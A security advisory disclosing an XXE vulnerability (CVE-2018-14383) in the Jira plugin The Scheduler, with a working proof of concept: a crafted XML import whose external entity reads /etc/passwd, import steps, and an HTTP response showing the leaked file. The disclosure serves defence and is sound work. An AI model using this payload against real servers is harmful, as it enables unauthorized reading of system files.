################################################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
################################################################################
#
# Product:  The Scheduler (Jira plugin)
# Vendor:   Transition Technologies PSC
# CSNC ID:  CSNC-2018-022
# CVE ID:   CVE-2018-14383
# Subject:  XML External Entity (XXE) Attack
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Thierry Viaccoz <thierry.viaccoz@compass-security.com>
# Date:     06.08.2019
#
################################################################################

Introduction:
-------------
The Scheduler [1] is a plugin for the Atlassian tool Jira [2]. It allows to 
automate the process of creating recurring tasks in Jira. Using the plugin, it 
is possible to define the issue template once and simply to select how often 
it should be created. After this, The Scheduler will simply create the issues 
in Jira.

For the administrators' convenience, the plugin offers the possibility to 
export and import scheduled issues in XML format from the administration 
interface.

Compass Security discovered that the import XML parser allows defining inline 
DTDs in the XML messages and interprets external entities. This makes it 
vulnerable to XXE (XML External Entity) attacks, i.e. allowing an 
administrator to read arbitrary files on the server.

Affected:
---------
Vulnerable:
 * 5.1.3

Not vulnerable:
 * 5.2.1
 * 3.3.7

No other version was tested, but it is believed for the older versions to be 
also vulnerable.

Technical Description:
----------------------
First of all, make sure to have at least one scheduled issue configured in the 
The Scheduler and export the configuration of The Scheduler as XML file by 
going to Administration > Add-ons > Export Scheduled Issues.

Then, modify the exported XML file to include the XXE "<!DOCTYPE Document 
[<!ENTITY c SYSTEM "/etc/passwd">]>" at the beginning. In addition, only keep 
one of the nodes "ScheduledIssueElement". In this node, set "&c;" as 
"paramValue" for the "ParamElement" with "paramName" set to "description". 
Below is an example of such an XML file:
========
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE Document [
	<!ENTITY c SYSTEM "/etc/passwd">
]>
<TheSchedulerBackup xmlns="http://www.tt.com.pl">
    <BackupInformation>
        <JiraVersion>7.7.0</JiraVersion>
        <PluginVersion>5.1.3</PluginVersion>
        <BackupVersion>2.0</BackupVersion>
        <BackupCreator>Administrator</BackupCreator>
        <BackupTime>Jun 19, 2018 11:55:11 AM</BackupTime>
        <ExportType>all</ExportType>
        <SkipDisabled>false</SkipDisabled>
        <SkipInvalid>false</SkipInvalid>
    </BackupInformation>
    <TheSchedulerData>
        <ScheduledIssueElement>
            <name>Compass Security Test</name>
[CUT]
            <ParamElement>
                <paramName>description</paramName>
                <paramValue>&c;</paramValue>
            </ParamElement>
[CUT]
        </ScheduledIssueElement>
    </TheSchedulerData>
</TheSchedulerBackup>
========

Afterwards, import the XML file by using the function Administration > Add-ons 
> Import Scheduled Issues.

Finally, go to Administration > Add-ons > Manage Scheduled Issues and open the 
issue that was just created by the import function. It shows the content of 
the file "/etc/passwd" in the "Issue Description" because of the XXE in the 
imported XML file, as shown in the response below.

Request:
========
GET /secure/ManageScheduledJob!default.jspa?scheduledJobId=[CUT] HTTP/1.1
Host: [CUT]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: [CUT]
Connection: close
Upgrade-Insecure-Requests: 1
=========

Response:
=========
HTTP/1.1 200 
Content-Type: text/html;charset=UTF-8
Date: Tue, 19 Jun 2018 12:21:13 GMT
Connection: close
Content-Length: 94629

<!DOCTYPE html>
[CUT]
                        <li class="item full-width">
                            <div class="wrap">
                                <strong class="name">Issue Description</strong>
                                <span>
                                                                            root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
[CUT]
=========

Workaround / Fix:
-----------------
The vulnerability is a result of a weakly configured/parameterized XML parser. 
The parser needs to be hardened by changing settings in the configuration or 
parameters in the code. It must not allow the use of inline DTDs and external 
entities.

Timeline:
---------
2018-06-19:     Discovery by Thierry Viaccoz
2018-07-11:     Initial vendor notification
2018-07-11:     Initial vendor response
2018-07-18:     Assigned CVE-2018-14383
2018-08-03:     Release of fixed version
2019-08-06:     Coordinated public disclosure date

References:
-----------
[1] https://marketplace.atlassian.com/apps/37456/the-scheduler
[2] https://www.atlassian.com/software/jira